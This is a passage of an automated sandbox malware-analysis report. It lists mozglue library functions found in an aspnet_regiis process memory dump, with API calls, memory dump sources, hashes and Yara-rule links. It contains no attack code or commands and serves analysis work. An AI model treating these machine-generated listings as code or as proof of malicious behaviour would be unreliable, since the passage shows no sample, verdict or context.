                                                                                                                                                                    • Opcode Fuzzy Hash: 282f7f30398015b8b2cf74a96ff423f471592cc2b289753a25643e737bf09700
                                                                                                                                                                    • Instruction Fuzzy Hash: B151B4B2A012168FEB15CF68D98076E73B6FF48318F25057AD916AB741E731F904CB91
                                                                                                                                                                    Function 6C7E27E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C7E2620,?,?,?,6C7D60AA,6C7D5FCB,6C7D79A3), ref: 6C7E284D
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C7E2620,?,?,?,6C7D60AA,6C7D5FCB,6C7D79A3), ref: 6C7E289A
                                                                                                                                                                    • free.MOZGLUE(?,?,?,6C7E2620,?,?,?,6C7D60AA,6C7D5FCB,6C7D79A3), ref: 6C7E28F1
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C7E2620,?,?,?,6C7D60AA,6C7D5FCB,6C7D79A3), ref: 6C7E2910
                                                                                                                                                                    • free.MOZGLUE(00000001,?,?,6C7E2620,?,?,?,6C7D60AA,6C7D5FCB,6C7D79A3), ref: 6C7E293C
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C7E2620,?,?,?,6C7D60AA,6C7D5FCB,6C7D79A3), ref: 6C7E294E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                    • Opcode ID: b332d20fc3609d8975c57f223f29f6d06ecc3e67f65b359c70bbd8bc1f7d9bc2
                                                                                                                                                                    • Instruction ID: b68df6335f87a5b68caa92ddb505b2c83c4773b3861d3204d5636a9069d47786
                                                                                                                                                                    • Opcode Fuzzy Hash: b332d20fc3609d8975c57f223f29f6d06ecc3e67f65b359c70bbd8bc1f7d9bc2
                                                                                                                                                                    • Instruction Fuzzy Hash: B74160B2A002078FEB14CF68D98876A77F6AB49308F250939D556EBB41E771E904CB91
                                                                                                                                                                    Function 6C79CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E784), ref: 6C79CFF6
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C79D026
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C79D06C
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C79D139
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                                                                                                    • String ID: MOZ_CRASH()
                                                                                                                                                                    • API String ID: 1090480015-2608361144
                                                                                                                                                                    • Opcode ID: 52b62c10bdbb48fdb836574bfd46c65474611d08f072e3151f0ce8d9405a12ef
                                                                                                                                                                    • Instruction ID: f01bafbc65dee2770720227884a919b7cdec5d5c4cba86f6bb7e7a952fb3e459
                                                                                                                                                                    • Opcode Fuzzy Hash: 52b62c10bdbb48fdb836574bfd46c65474611d08f072e3151f0ce8d9405a12ef
                                                                                                                                                                    • Instruction Fuzzy Hash: 5941D272B402174FEB248E6C9E9A36A76F0EB5A358F150539E918E7F84D7A15C00CBC5
                                                                                                                                                                    Function 6C794DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C794E5A
                                                                                                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C794E97
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C794EE9
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C794F02
                                                                                                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C794F1E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 713647276-0
                                                                                                                                                                    • Opcode ID: e34ef38202cd1ef50c181287799826a8c06d5eec44af8abbc3682408ad5c7a23
                                                                                                                                                                    • Instruction ID: 725185e0895a89fad7fe63ba5dd975e0bf723a96835e82f12de0d93e7f73fdde
                                                                                                                                                                    • Opcode Fuzzy Hash: e34ef38202cd1ef50c181287799826a8c06d5eec44af8abbc3682408ad5c7a23
                                                                                                                                                                    • Instruction Fuzzy Hash: 7A41F0716087069FC705CF28D88095BB7E9FF89344F148A2DF56697B41DB30E918DB92
                                                                                                                                                                    Function 6C7FA820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F770), ref: 6C7FA858
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7FA87B
                                                                                                                                                                      • Part of subcall function 6C7FA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C7FA88F,00000000), ref: 6C7FA9F1
                                                                                                                                                                    • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C7FA8FF
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7FA90C
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F770), ref: 6C7FA97E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1355178011-0
                                                                                                                                                                    • Opcode ID: 1b3304222bfc90e9d478fb9509e149b05bc8dd543d0f44db76e21118c3a94f8f
                                                                                                                                                                    • Instruction ID: 422c52b4c9e83ed4e0988b2d05131847a21cfac2089cb2e0a06d2c740451dac2
                                                                                                                                                                    • Opcode Fuzzy Hash: 1b3304222bfc90e9d478fb9509e149b05bc8dd543d0f44db76e21118c3a94f8f
                                                                                                                                                                    • Instruction Fuzzy Hash: 6741C6B0E002058FDB10DFA4D989BDDBBB0FF04324F108A39E825AB791D7719946CB91
                                                                                                                                                                    Function 6C7A1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(-00000002,?,6C7A152B,?,?,?,?,6C7A1248,?), ref: 6C7A159C
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C7A152B,?,?,?,?,6C7A1248,?), ref: 6C7A15BC
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,6C7A152B,?,?,?,?,6C7A1248,?), ref: 6C7A15E7
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,6C7A152B,?,?,?,?,6C7A1248,?), ref: 6C7A1606
                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C7A152B,?,?,?,?,6C7A1248,?), ref: 6C7A1637
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 733145618-0
                                                                                                                                                                    • Opcode ID: 3c62d4d0b93764e87447ac28c1083f0093ae4ffa4e80023e69f7a985b324ef16
                                                                                                                                                                    • Instruction ID: 581f774e417116b04c7f2a99a66e14249521c623df35fb8547d2aa150b7407cf
                                                                                                                                                                    • Opcode Fuzzy Hash: 3c62d4d0b93764e87447ac28c1083f0093ae4ffa4e80023e69f7a985b324ef16
                                                                                                                                                                    • Instruction Fuzzy Hash: 87310872A00114CBD7188EB8DA5456E73E9BF853647290B2DE423DBBE5EB30D9068791
                                                                                                                                                                    Function 6C7FAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C80E330,?,6C7BC059), ref: 6C7FAD9D
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C80E330,?,6C7BC059), ref: 6C7FADAC
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,00000000,?,?,6C80E330,?,6C7BC059), ref: 6C7FAE01
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,6C80E330,?,6C7BC059), ref: 6C7FAE1D
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C80E330,?,6C7BC059), ref: 6C7FAE3D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3161513745-0
                                                                                                                                                                    • Opcode ID: 4e29a07e98e87aa38dd67af845d3c7aeb0c895fddd1191c95a13ece969e6365b
                                                                                                                                                                    • Instruction ID: d9b87f8ff48c20ee9b934e019e2f74a39f9044186a24d9ec810c7ccdd527ce57
                                                                                                                                                                    • Opcode Fuzzy Hash: 4e29a07e98e87aa38dd67af845d3c7aeb0c895fddd1191c95a13ece969e6365b
                                                                                                                                                                    • Instruction Fuzzy Hash: F63141B1A003159FDB10DF798D85AABB7F8EF48624F158839E85AD7701E734A805CBA1
                                                                                                                                                                    Function 6C7F5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C80DCA0,?,?,?,6C7CE8B5,00000000), ref: 6C7F5F1F
                                                                                                                                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C7CE8B5,00000000), ref: 6C7F5F4B
                                                                                                                                                                    • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C7CE8B5,00000000), ref: 6C7F5F7B
                                                                                                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C7CE8B5,00000000), ref: 6C7F5F9F
                                                                                                                                                                    • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C7CE8B5,00000000), ref: 6C7F5FD6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1389714915-0
                                                                                                                                                                    • Opcode ID: 3f75a24ec26d7f4b5640f991ecc03f1f08902c057033f1c38a9e2bdd28b91dc7
                                                                                                                                                                    • Instruction ID: 64b36e8d55b91e1dbbacab81335677d72e996323806cab4e781541fdc3f814c2
                                                                                                                                                                    • Opcode Fuzzy Hash: 3f75a24ec26d7f4b5640f991ecc03f1f08902c057033f1c38a9e2bdd28b91dc7
                                                                                                                                                                    • Instruction Fuzzy Hash: D03100343106018FE764CF29D9D8E26BBF5FF89319B6485A8E56687B95C731EC42CB80
                                                                                                                                                                    Function 6C79B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C79B532
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C79B55B
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C79B56B
                                                                                                                                                                    • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C79B57E
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C79B58F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4244350000-0
                                                                                                                                                                    • Opcode ID: 2837f1cd43f4aac1408bc26a7fd6ceb2aaf014347677f1e9e3a60fa16f984723
                                                                                                                                                                    • Instruction ID: 6877c83039964add4cbe95d054846184e977e50e907f87965bab5c698eb1c97b
                                                                                                                                                                    • Opcode Fuzzy Hash: 2837f1cd43f4aac1408bc26a7fd6ceb2aaf014347677f1e9e3a60fa16f984723
                                                                                                                                                                    • Instruction Fuzzy Hash: 44210771A002059BDB108F68DD44BBABBF9FF45318F284139E818DB341E776E911C7A1
                                                                                                                                                                    Function 6C79B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C79B7CF
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C79B808
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C79B82C
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C79B840
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C79B849
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1977084945-0
                                                                                                                                                                    • Opcode ID: d3307c0fa99e3c0d26240cee68a53e89c73a1969a7f92812fc5be9bd4b4293c2
                                                                                                                                                                    • Instruction ID: 3550d375d371ce39f2acf2bc342aecb012f8d24a443c4d1e8bbb1f8d70a51128
                                                                                                                                                                    • Opcode Fuzzy Hash: d3307c0fa99e3c0d26240cee68a53e89c73a1969a7f92812fc5be9bd4b4293c2
                                                                                                                                                                    • Instruction Fuzzy Hash: 28214BB0E0020A9FDF14DFA9D9859BEBBF4EF49318F148129E805A7701E731A944CBE1
                                                                                                                                                                    Function 6C7F6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C7F6E78
                                                                                                                                                                      • Part of subcall function 6C7F6A10: InitializeCriticalSection.KERNEL32(6C81F618), ref: 6C7F6A68
                                                                                                                                                                      • Part of subcall function 6C7F6A10: GetCurrentProcess.KERNEL32 ref: 6C7F6A7D
                                                                                                                                                                      • Part of subcall function 6C7F6A10: GetCurrentProcess.KERNEL32 ref: 6C7F6AA1
                                                                                                                                                                      • Part of subcall function 6C7F6A10: EnterCriticalSection.KERNEL32(6C81F618), ref: 6C7F6AAE
                                                                                                                                                                      • Part of subcall function 6C7F6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C7F6AE1
                                                                                                                                                                      • Part of subcall function 6C7F6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C7F6B15
                                                                                                                                                                      • Part of subcall function 6C7F6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C7F6B65
                                                                                                                                                                      • Part of subcall function 6C7F6A10: LeaveCriticalSection.KERNEL32(6C81F618,?,?), ref: 6C7F6B83
                                                                                                                                                                    • MozFormatCodeAddress.MOZGLUE ref: 6C7F6EC1
                                                                                                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C7F6EE1
                                                                                                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C7F6EED
                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C7F6EFF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4058739482-0
                                                                                                                                                                    • Opcode ID: 8f062ca6d21c09c7fb23461b44a662686aa666a3a68bfb81762ea2e03d788f0e
                                                                                                                                                                    • Instruction ID: 0bd62f9d8a1d45f6178c796ffe43abcb075b5504030fecc3729d787aae279ce4
                                                                                                                                                                    • Opcode Fuzzy Hash: 8f062ca6d21c09c7fb23461b44a662686aa666a3a68bfb81762ea2e03d788f0e
                                                                                                                                                                    • Instruction Fuzzy Hash: B421C4B1A0421A8FDB10CF29D9C9AAA77F9FF84308F044039E81997341DB309A59CF92
                                                                                                                                                                    Function 6C7D0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C793DEF), ref: 6C7D0D71
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C793DEF), ref: 6C7D0D84
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C793DEF), ref: 6C7D0DAF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Virtual$Free$Alloc
                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                    • API String ID: 1852963964-2186867486
                                                                                                                                                                    • Opcode ID: 0542a0dfbff5b92af1c60869c7f675ce75a2ae994adb66b47334d831c90d1bd3
                                                                                                                                                                    • Instruction ID: d086a23084259250e9029a3c9a25348018d086919a2dc6f08ae5841dd7d6e792
                                                                                                                                                                    • Opcode Fuzzy Hash: 0542a0dfbff5b92af1c60869c7f675ce75a2ae994adb66b47334d831c90d1bd3
                                                                                                                                                                    • Instruction Fuzzy Hash: AAF0E97139429627E63416661F0BF6A269D67C2B28F719037F605DEEC0DA50F804C6A4
                                                                                                                                                                    Function 6C7F5850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 6C7F586C
                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 6C7F5878
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C7F5898
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C7F58C9
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7F58D3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
